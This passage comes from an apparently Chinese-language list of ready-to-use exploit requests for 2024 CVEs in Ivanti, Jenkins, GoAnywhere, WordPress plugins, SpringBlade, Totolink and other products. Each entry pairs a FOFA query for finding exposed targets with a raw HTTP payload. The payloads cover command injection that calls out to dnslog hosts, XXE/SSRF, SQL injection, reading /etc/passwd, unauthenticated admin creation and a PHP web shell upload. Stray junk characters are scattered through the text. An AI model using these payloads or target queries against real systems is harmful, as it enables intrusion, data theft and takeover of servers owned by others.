Accept: */*& T% h! {0 z0 n4 |$ F+ N5 m
Accept-Encoding: gzip, deflate
8 I& N- B2 X( {. KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! F( O/ [+ z- f: d0 W# MContent-Type: application/x-www-form-urlencoded; charset=UTF-8
+ x3 X1 a0 F$ \9 Q X4 OX-Requested-With: XMLHttpRequest
+ Q4 P# C0 K7 E8 ~. Z" c$ R% A0 q3 s0 u4 P7 N5 b
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
5 R& {$ \' Q( \8 ~* B+ a6 y) m- V) U( w& y$ P; a5 ~
; R& G* f. q7 O6 D+ a- @' x$ p
99. Ncast盈可视高清智能录播系统busiFacade RCE2 a3 ]1 C8 m2 D& h
CVE-2024-0305( Z; J, W6 e4 Q+ n" c2 m" L, j [
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
3 d2 }/ P9 p- K6 VPOST /classes/common/busiFacade.php HTTP/1.17 E. h* h- q/ J9 A6 `: t- _' C
Host: 192.168.40.130:8080
2 |) t+ W' l. v" `) ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 |- X: E) C: V
Connection: close
# j" m: C' X* b( j5 [. L! [Content-Length: 154: h& ]/ j, x, u, Y/ J, h6 _. b
Accept: */*
& N6 n2 o6 s3 L0 h2 ]7 O5 AAccept-Encoding: gzip, deflate
2 r7 T( g, e2 ?0 Y wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: m2 {$ t: x* T- [5 U% u1 c5 L
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
# C( C- m3 P& E! J' [# n( [; H$ K% iX-Requested-With: XMLHttpRequest
: c: m1 m) F8 q% i6 L+ S' A; U1 K& q* L, M3 T6 q
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
, J/ j/ \- C$ L8 W9 d* d" x5 e( V8 N1 ]0 _7 I0 D
) p7 U, ?9 p( J) K) h" n! t& }100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传: ?9 v: L2 x1 d9 F- M1 w2 ?/ d. W
CVE-2024-0352
5 }1 ]& O8 m6 l4 |" ^% [FOFA:icon_hash="874152924"* \& w0 G0 H, W: h/ ~3 h4 M
POST /api/file/formimage HTTP/1.17 X! N7 U: w$ W5 {4 A
Host: 192.168.40.130
# o9 _4 v) z1 gUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.360 c& C' S; h" I r7 c' L
Connection: close
) v& a8 E" ^9 B$ @' TContent-Length: 201" e, u! |% |3 h0 G' T
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei# Z2 s; Z7 l6 R* t* V& B# W- _6 G7 R
Accept-Encoding: gzip* i' j; B, f( j# x* y5 z# B% b
" d+ w, r" m) q. c$ s" E------WebKitFormBoundarygcflwtei' _2 _ H h3 d& ~$ _% K* N) N/ B5 ~
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
1 `3 `2 x! c; K9 M. tContent-Type: application/x-php" q E* k; A: C2 [% S
. O- u* G. B7 p2 w5 r8 {' `& D
2ayyhRXiAsKXL8olvF5s4qqyI2O
6 j/ }8 @+ x4 f. i------WebKitFormBoundarygcflwtei--+ [6 `" y4 n' ~
+ a; G+ K. w5 x
; U) a) W6 e- H( B! u2 C; K101. ivanti policy secure-22.6命令注入! Y$ z/ b: `: P. L `* k( v L
CVE-2024-21887
8 s x4 t# X8 ZFOFA:body="welcome.cgi?p=logo"! Q8 c2 ]7 m* _# B" N
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
6 K+ r6 ~6 u% E3 o! sHost: x.x.x.xx.x.x.x
+ }8 H3 \) S# W! }9 D. WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; S6 Z& g. ?6 {$ U$ c) B; O
Connection: close
& Y/ l7 M, b) A; H. H& `Accept-Encoding: gzip
# X$ a; F/ \- F4 D" i; L# U7 g. L- M4 ^/ ]9 r* D
& Q) R/ n& ^6 e! n& g0 c$ A102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行* @9 S6 h0 y2 W" Q+ F: C
CVE-2024-218930 m" L9 e: R+ g: k8 w1 ]' ^
FOFA:body="welcome.cgi?p=logo"
8 _# w, ]7 X, c* {POST /dana-ws/saml20.ws HTTP/1.1+ x9 B0 ?; V) \; u9 G, b4 C; `7 E) _
Host: x.x.x.x
0 p- i4 I; i# R+ L3 Z" CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ J( N# _! Y9 `, q2 L" y5 oConnection: close
3 J. l4 I7 p' R% XContent-Length: 792
& J9 L! n5 c* L; q" V5 ~ bAccept-Encoding: gzip
( p6 ]6 S9 b p7 X
% E0 n0 x L5 o4 Q' g0 Z7 }<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>) c8 H5 C8 N6 t& ?
2 J- y E. }' ~! p( S
103. Ivanti Pulse Connect Secure VPN XXE } j$ N4 ^# j
CVE-2024-22024! W0 W( P( _8 j1 t% e* @4 e
FOFA:body="welcome.cgi?p=logo"
% O8 `8 [* i% W& FPOST /dana-na/auth/saml-sso.cgi HTTP/1.16 r1 X, J2 j; J5 ~
Host: 192.168.40.130:111
% o7 {, q; p: u- ?User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
9 H8 v% a; A: M8 \) f% r0 k6 _Connection: close
$ G: @# W2 t, O1 { nContent-Length: 204
* V& N8 e, [9 r) ^Content-Type: application/x-www-form-urlencoded
! }5 ?( F# V" yAccept-Encoding: gzip" a; }, d& k% h3 }0 u" Y* Z, p
! N' `$ F3 p1 ]0 A/ m: kSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
+ g) M# S0 _+ I! t9 i" ^4 B
* d, _8 {( k' u/ A' C# @
+ m7 T, I) s: ^( Q% z6 @! N8 b其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
3 I+ ~$ ~, ~% X3 _5 h6 O4 o* [% v<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>/ ?- g( J& g! C1 [4 B5 z4 C, r
4 e% u! i4 h9 @. z/ o
: }. E1 _' g$ T7 N104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
% w# N& |5 N0 y7 e* W5 w j6 A4 ?CVE-2024-0569' U' L$ W1 Z/ p2 ?3 V& a' S P2 n
FOFA:title="TOTOLINK"/ c- x+ c7 _% i5 H- \4 K6 _
POST /cgi-bin/cstecgi.cgi HTTP/1.1+ L, |3 T& D: d% p3 i
Host:192.168.0.18 [$ W; f8 y2 Q/ F7 \$ J2 b/ P
Content-Length:41
1 i+ J% Z, R4 f$ e+ z8 w! yAccept:application/json,text/javascript,*/*;q=0.01; E$ d: O( J; r( I
X-Requested-with: XMLHttpRequest% e: n; w3 G$ q6 W6 i
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36, u/ L# k/ R- z4 C. ~" a* P | H8 k
Content-Type: application/x-www-form-urlencoded:charset=UTF-8% A- I) J" O R3 O
Origin: http://192.168.0.1! V. m' h& `! D* z- v6 ]! ~: j
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
0 n) d6 B1 [6 d; K9 mAccept-Encoding:gzip,deflate8 U) S$ d- K' o. [ O
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.77 T3 O# z3 A2 k) g! [* { S! @
Connection:close& H1 v- w+ B# y! H& f
6 k: F) w2 l4 b! P s4 |/ w! F{ r$ E- M; Z2 K3 y/ w# m3 Q
"topicurl":"getSysStatusCfg",
; _. M' g* Q, A( w2 g* v"token":""0 w1 s& J1 a8 |! s" |/ x, }' ?
}
" K$ R# J1 ]& u; j0 Z! M( @' A8 o- y# Z! I4 g f
105. SpringBlade v3.2.0 export-user SQL 注入
# @ t1 U. u( U# b0 A( T) r6 l9 lFOFA:body="https://bladex.vip"' W% M% b& E) a8 A" |# a5 `( u
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
% s ]; K& F, S/ e) z( q; V! E* Q3 D. s) Q0 Y
106. SpringBlade dict-biz/list SQL 注入
r, k4 d4 K+ D! a1 f! XFOFA:body="Saber 将不能正常工作"& T0 U# X2 F$ a
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1( @3 H& x/ _* E% J
Host: your-ip
$ ?" o2 u5 V& h; cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 O# w' |' O' M+ {% @
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
7 Y, A7 W, Y( |Accept-Encoding: gzip, deflate) e5 w: Q0 ?: U, n" j0 N
Accept-Language: zh-CN,zh;q=0.9
# a3 v8 C: ^, Z5 I4 I% l, G- v5 UConnection: close
+ G9 v; \+ w9 Z
- J8 @" x8 W/ V$ D# p9 Q3 J9 b- t
- q4 O5 f$ Q/ }. J; ^$ n107. SpringBlade tenant/list SQL 注入
7 e6 Q: K% D! z, A/ z) AFOFA:body="https://bladex.vip"
; B- @& I: y; V ^6 MGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
+ G: J% O; n+ z& Q9 V& H, \' ?Host: your-ip
# i+ q/ a4 W1 ?0 t) S* W; ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 M5 x* G2 t7 w+ g) u- tBlade-Auth:替换为自己的- P$ H0 Q/ k+ _* z
Connection: close t' j8 M5 E# j7 T+ J- j* P
6 h( w% ]) R& A2 ?9 w3 f. U0 ~, K; s4 @) J: v' I
108. D-Tale 3.9.0 SSRF4 M8 \& Q v. E! t
CVE-2024-21642 @' Y0 M7 ]4 K
FOFA:"dtale/static/images/favicon.png"
4 A5 s- Z" `) A2 YGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1& p. T; ^& {; ~* R7 k1 W, m- ?
Host: your-ip
% {) j' k9 k3 g5 c& mAccept: application/json, text/plain, */*
. M* m5 b: F4 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 {. P3 t( [. M9 _& }Accept-Encoding: gzip, deflate
& J7 K1 U' z, f' ~! k% K8 ]& {Accept-Language: zh-CN,zh;q=0.9,en;q=0.8$ B* n* m5 O% H
Connection: close* r* l) P0 }( U
7 y4 O) T/ w4 ?
" Q. c4 h. t5 J$ N- @
109. Jenkins CLI 任意文件读取+ ~: ^) h7 D( J2 v9 S' H2 a/ G
CVE-2024-23897* @5 H* T& k Y# N! A* O& Z
FOFA:header="X-Jenkins"
+ N0 W$ H+ I: N+ O. XPOST /cli?remoting=false HTTP/1.1; [& [$ a' O& h5 Q6 d$ B6 S2 n G
Host:
" J. r" \4 L# H0 P2 J5 ?8 `. y9 pContent-type: application/octet-stream$ J2 j/ }2 E! L
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e929 o: X( V; _6 h* A8 f
Side: upload
% ]8 }& \& X; a8 KConnection: keep-alive
7 o5 {- k, o/ B' @/ H/ z. _: Z: a# yContent-Length: 163+ ]# E u5 m/ J4 J
' M; Z" a' ~" t, [8 Q
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
$ y u z9 S( ^) A$ q8 p/ ]& A: X% ~
& ]3 C# o& V! |* D
POST /cli?remoting=false HTTP/1.1
7 p; p: p2 C: h. p( s3 f( E" XHost:/ s5 F% H9 _3 l) P7 `/ K
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
6 ?/ }2 Z7 _$ s8 ]' \download; D* S d& G/ | p9 `1 _
Content-Type: application/x-www-form-urlencoded
" v R3 ?# Z/ K7 y! EContent-Length: 0
4 f: X' r/ N2 `6 ~( z9 V [( o& F+ W `1 r+ q9 t6 J V' O
+ O. e# w5 ]; Q, K
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
8 m5 I3 c: d+ w$ t: X* @- [; Yjava -jar jenkins-cli.jar help4 c: i- H: H! J0 A: F5 |
[COMMAND]$ N- D% H- Z$ h* {5 m
Lists all the available commands or a detailed description of single command.
# U) [) p2 n4 o) A5 H4 x COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash); D" i( K H# c6 H# P3 ]! t0 W* q
+ l3 Z* m. h' t- }3 z3 [& c c% k: i, \) R7 z9 H5 |; Z( ?
110. Goanywhere MFT 未授权创建管理员
' o% B$ C8 o8 @' cCVE-2024-0204
$ q5 ?% a0 a+ G$ }% b! FFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"3 u+ O2 \! v: W! C6 W$ h
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
% g& _' Z6 |9 g( a" P' f0 Q- O/ uHost: 192.168.40.130:80003 c* x1 K& Y6 u6 d; M: U
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36, ^3 ~3 C( M' u3 ]2 ~8 t8 ^
Connection: close" g, q! p! Q/ j7 I0 b. ^- E2 p
Accept: */*# H6 s; a( E5 q6 p5 s% S
Accept-Language: en
1 R5 L. J0 D9 a0 Z( PAccept-Encoding: gzip
4 j* @& H$ f8 `+ W* v% t. |6 S1 c* Q. b
! Z9 L& S# c# t7 U
111. WordPress Plugin HTML5 Video Player SQL注入! h% G2 r# o/ H1 e
CVE-2024-10614 [1 h0 R' h& \3 X) o7 ~7 X; Q$ p
FOFA:"wordpress" && body="html5-video-player" C% G& f, u# y2 H8 d
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
$ ^5 O4 _0 P5 x0 `8 D# xHost: 192.168.40.130:112
6 u" v( Z9 q$ h, VUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36( z( \% F/ k9 `% v# e
Connection: close# N* d- P& } H1 E
Accept: */*3 \2 i( y- p+ `
Accept-Language: en1 K v: J6 |. L( Y! O7 c$ l
Accept-Encoding: gzip7 K6 b) [: ~3 X1 S# ~
( w+ I/ A2 ^0 I8 ? }: y
2 D7 S% I+ {' ^; K112. WordPress Plugin NotificationX SQL 注入
% @" P+ L4 g; ]) q+ W5 L E+ w( oCVE-2024-1698
1 |) u3 b9 |( T/ d w$ IFOFA:body="/wp-content/plugins/notificationx"
* M, m7 B: c) PPOST /wp-json/notificationx/v1/analytics HTTP/1.1. A3 U8 i" E4 [. @4 S% a, [
Host: {{Hostname}}
; M7 R m) N% a p1 }9 @Content-Type: application/json- U/ ~6 W+ b9 f7 Q; m# w2 L. x
2 _" F8 @# P8 D" e: q{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}# A& k0 g& F5 k9 a O1 W
, d- J# Z4 g/ t, n$ F! \+ v# u3 R# {
113. WordPress Automatic 插件任意文件下载和SSRF) F+ k3 \) ]9 M, k6 P: L M
CVE-2024-279543 B6 d; h5 G1 j4 d1 `
FOFA:"/wp-content/plugins/wp-automatic"7 u/ J7 M. O0 H5 Y& }- X5 c7 K( J; w$ g
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.13 \ m; y/ @: x1 D+ R
Host: x.x.x.x
+ [( H" c1 \3 w7 e) [% hUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36& F# g; ^. d- G1 B, |$ L4 k4 i$ b
Connection: close
9 B9 F6 J+ x. J; z/ EAccept: */*
8 k. A5 E' f$ Y" y* p# o) I0 mAccept-Language: en" ^+ ~" l! Y/ ?8 Z
Accept-Encoding: gzip5 d" [4 l; N- l. c0 D7 r$ g: U
- Y- `& X( f/ b" p, M3 ~/ _/ m2 a1 Y) j! @
114. WordPress MasterStudy LMS插件 SQL注入! Q0 t$ {; b- s1 [& H @* Q Y3 e e
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
8 ]& O% ^% ?3 [6 c; d" ?GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
1 Z- S" o6 K" g% hHost: your-ip
# Z9 q7 c# h$ K- W. A7 @) YUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
9 n: Y8 y- v3 h( G( EAccept-Charset: utf-8
7 D$ ?; G5 U2 Z$ x8 I: G. ~( sAccept-Encoding: gzip, deflate
2 \) p2 z+ G1 {' UConnection: close
$ \' x8 z# F& j, O" v+ z4 V
2 F/ F& M% M* V% l4 H( ~. h
T& f7 I7 [+ i% A2 g( Q& f8 L115. WordPress Bricks Builder <= 1.9.6 RCE# \. Q+ K; q* d2 ~/ [% P$ E. B
CVE-2024-25600
, |+ K! e+ j: Q; ?& n d/ ~: B! SFOFA: body="/wp-content/themes/bricks/"6 f" `- ^8 b/ C5 k& d) U l
第一步,获取网站的nonce值6 U' [7 e4 x8 Y6 ?0 T5 q
GET / HTTP/1.1, n, ]" I! J( M7 k
Host: x.x.x.x% S/ R; Y2 u1 |
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.364 Q" d. @' l ?" f
Connection: close
2 ~2 t: H. Q6 HAccept-Encoding: gzip5 Y$ N* Y* x7 i
, h) ~! g0 _" c; k# X: l6 L' B
) S, Q! o+ _$ N! S5 B第二步替换nonce值,执行命令
7 V* I: F" {: G; W7 cPOST /wp-json/bricks/v1/render_element HTTP/1.15 k: E5 F9 L. |
Host: x.x.x.x7 d1 \3 r: B+ k6 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 G, u- k" S; ]8 |6 {Connection: close
& J+ T3 i, ?& B4 eContent-Length: 356
! H6 P: m& C" e; G8 T" p4 e3 aContent-Type: application/json
0 g0 y+ f" h1 _$ J( l$ zAccept-Encoding: gzip
# s2 U* u/ o# d( g# z6 T1 {
+ k1 o0 f3 W8 B- r' O/ T' N{
) l0 J" ]7 K( Q4 E* ~"postId": "1",
( {1 O- e3 Z/ b3 m5 U$ O# c "nonce": "第一步获得的值",! l1 a- p+ k! J3 a# S
"element": {
- V) g4 `8 ?7 A( o* f# k6 S "name": "container",
6 r8 a; ~7 r, ` "settings": {/ g- {! N: H9 a; R& V
"hasLoop": "true",6 X9 ~, {0 T9 v3 h0 K A0 \
"query": {
6 r" X9 Q+ O* |: k0 h5 O" a "useQueryEditor": true,
. |4 ^1 x: {4 n; n9 p* ^7 S "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",3 y% _1 m7 o2 r I% Q( J+ C W
"objectType": "post"
5 u! N' ~# O0 I }/ y" z) |3 J: t& T
}
: w% g6 v. {" p+ X* ]9 T/ f }( P" b0 T0 P; S0 R$ o
}. i0 V4 L, L' v$ t$ H, x
* {! m( O/ b; f% }% M, O
- G. f, G0 }9 _: W$ ~7 L) T9 _ V
116. wordpress js-support-ticket文件上传& o2 @! U D+ P; ?2 k5 s. e
FOFA:body="wp-content/plugins/js-support-ticket"
0 e1 H1 C0 o L1 V0 ?- q4 o' ~POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
+ G- }9 p1 d) cHost:
' s# G$ N: x8 u1 y" Y# r) p" uContent-Type: multipart/form-data; boundary=--------767099171$ e9 ~* O( U. H2 j4 J4 o* f$ h0 \
User-Agent: Mozilla/5.0
/ C# }/ K5 ]& N' a* n" L/ `( s. t" n) |: b. C7 K
----------767099171
6 k+ L" D& Q/ WContent-Disposition: form-data; name="action"
3 W% B; p$ m" K5 h3 D I+ C2 O! Gconfiguration_saveconfiguration
0 ^2 B5 b( I, c6 t. B& a: x$ A----------767099171
# H3 O: `# U0 ]; y2 K0 }& e* M: HContent-Disposition: form-data; name="form_request"- L& ^ V* K4 E2 A9 H# O
jssupportticket( p3 f2 z9 @5 R1 n1 v+ _
----------767099171
; O" Q0 u8 F# ?% {Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
4 |$ U, f F, |) o, u- s/ rContent-Type: image/png
* \. n+ @! i" W8 v/ ~----------767099171--
9 a9 _& e! ?/ s9 C( W) g' l3 R, z& v; O9 t* f! t
6 {$ O% f0 o* Z7 {
117. WordPress LayerSlider插件SQL注入
1 d( ?' d. d& ?% {4 Q& K1 iversion:7.9.11 – 7.10.0/ O1 x0 ~* x. z, {. r& F* Q H
FOFA:body="/wp-content/plugins/LayerSlider/"
1 g/ y2 F$ t8 _( rGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1* i& p: ]3 Z- f( ]0 _% m. R( {) `
Host: your-ip
- N S, ~, {6 A, P& A: P8 M. o/ R. vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
7 Y$ W1 n* Y3 }% W' U# JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& c( L3 \8 ~/ P- r4 n) o* D; kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% X) a7 _3 }/ ]: u LAccept-Encoding: gzip, deflate, br: O0 |& m5 h; S5 d0 w; k2 k+ d
Connection: close# S+ R6 I0 R$ j
Upgrade-Insecure-Requests: 1( r6 R' a: v7 O) A, ^
6 n/ N2 {( t5 T$ d8 X) G
: ?. X5 O- |, T1 h5 h
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传2 K" b1 r* c! B: i2 F
CVE-2024-0939
2 V9 S, L- R z% T6 ~5 O5 PFOFA:title="Smart管理平台"" b7 L0 o. L3 M
POST /Tool/uploadfile.php? HTTP/1.1
) W, F+ ^; h4 Z1 l' JHost: 192.168.40.130:84439 \& ~. ]. t1 P" q, m; T. p+ K
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
2 V% m0 T$ m4 g3 l1 I2 g3 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.02 [( O7 f3 L0 \' e/ J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; ?" |1 k, k% z+ a# V% m2 p2 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" u& i* w: U2 I8 B$ J
Accept-Encoding: gzip, deflate' a; w' v' t; h2 V5 i
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887- V( I% P$ q7 X
Content-Length: 405
- s' ~8 I4 y: _8 x9 ?Origin: https://192.168.40.130:8443
7 j- P& k' W! B ?7 lReferer: https://192.168.40.130:8443/Tool/uploadfile.php
+ Y5 ~3 t. U9 \% ^: C7 `0 y- @5 zUpgrade-Insecure-Requests: 1: q1 A% `6 C1 u
Sec-Fetch-Dest: document/ s( z% V j8 I5 _0 c! i1 ?! c
Sec-Fetch-Mode: navigate3 n! f! Z9 P7 {0 e; Y- }4 \
Sec-Fetch-Site: same-origin! N, @! o4 Z: u# h
Sec-Fetch-User: ?1( v# \- m! ?5 W8 H7 ~
Te: trailers4 Q/ n* n$ `/ }) W% Z v# z
Connection: close
7 j- M0 K7 A$ ^' a. c* j- F& d' e/ K0 s4 w- N! P
-----------------------------13979701222747646634037182887
8 l0 E. c% d1 J$ T4 ZContent-Disposition: form-data; name="file_upload"; filename="contents.php"" x2 x2 ]+ e) X$ k: M2 G
Content-Type: application/octet-stream
8 k- J Z6 p" Y1 N, Q
4 B1 G3 ^2 V7 I7 i% v e<?php
+ E5 M+ k) j5 o% `9 i) Gsystem($_POST["passwd"]);
/ b* x8 z) ~+ v9 p" t?> t: A0 b i1 q; {5 y6 n; ]! N7 f
-----------------------------13979701222747646634037182887
9 _( K1 b( d" R$ O. Q) f+ m6 PContent-Disposition: form-data; name="txt_path"4 r5 M6 n0 ?6 \- M. D( b8 X. Q" c: f
/ A: I" h; `/ F; k' d/home/src.php
# g3 e" {- P7 e-----------------------------13979701222747646634037182887--
. P/ U' T z5 E1 y, K9 Q X1 U9 Y$ ~* k; @' i6 F% H B! @
; w o8 X( Y/ ^& `
访问/home/src.php
# H1 Z& t5 `2 P" Q8 N: x8 _+ X3 }# Y6 ^. ]* p( r8 ^/ f
119. 北京百绰智能S20后台sysmanageajax.php sql注入
, T7 Z- Y) d6 a" R' vCVE-2024-1254& ^! ?1 i( K5 M8 I1 D
FOFA:title="Smart管理平台"
) F) t5 y4 z% M. M& ?先登录进入系统,默认账号密码为admin/admin7 y! g+ ]3 ^- S4 I: _7 j6 ~
POST /sysmanage/sysmanageajax.php HTTP/1.11
' r* J1 _4 ?3 L6 k& ?, ^Host: x.x.x.x
% \( M9 p8 ]! I C' T9 P8 fCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
; R! o6 ` v- \, `6 u! Y) I$ p0 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.07 {; {9 M' ?+ G2 J9 ^8 H: \
Accept: */*% G: \" h, \2 z$ x+ C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: I3 u7 ]/ \) J+ w, k
Accept-Encoding: gzip, deflate# h. L# i- }1 ^/ l
Content-Type: application/x-www-form-urlencoded;( m n2 h9 _" `1 v, T# ]# h: F/ r! z
Content-Length: 109
! a% o& C' G8 e- {4 ?Origin: https://58.18.133.60:84438 t( Y' M- c+ b+ q7 l
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
